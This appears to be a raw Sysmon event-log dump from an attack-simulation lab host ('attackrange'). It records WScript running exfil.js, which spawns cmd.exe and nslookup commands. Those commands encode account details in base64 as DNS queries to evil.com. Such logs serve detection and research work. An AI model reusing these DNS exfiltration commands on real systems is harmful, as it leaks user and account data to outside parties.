14:16:33.117{2E1864BB-17A1-629A-783D-000000005F02}55525748C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-A740-000000005F02}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.130{2E1864BB-17C1-629A-A740-000000005F02}6688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbcwy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.117{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpgr.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.095{2E1864BB-17C1-629A-A540-000000005F02}77325708C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-A640-000000005F02}6036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.079{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.079{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.079{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.079{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.079{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A640-000000005F02}6036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.079{2E1864BB-17C1-629A-A440-000000005F02}42807080C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-A640-000000005F02}6036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.093{2E1864BB-17C1-629A-A640-000000005F02}6036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C1-629A-A440-000000005F02}4280C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpgr.tmp 2>&1 10341000x8000000000000000200919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.064{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-A540-000000005F02}7732C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.064{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C1-629A-A540-000000005F02}7732C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.064{2E1864BB-17C1-629A-A540-000000005F02}77325708C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-A440-000000005F02}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A540-000000005F02}7732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A440-000000005F02}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.048{2E1864BB-17A1-629A-783D-000000005F02}55526024C:\Windows\System32\WScript.exe{2E1864BB-17C1-629A-A440-000000005F02}4280C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.051{2E1864BB-17C1-629A-A440-000000005F02}4280C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpgr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000200908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.033{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.033{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000200906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.033{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnhpg.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.995{2E1864BB-17C0-629A-A240-000000005F02}38487468C:\Windows\system32\conhost.exe{2E1864BB-17C1-629A-A340-000000005F02}3776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.995{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.995{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.995{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.995{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 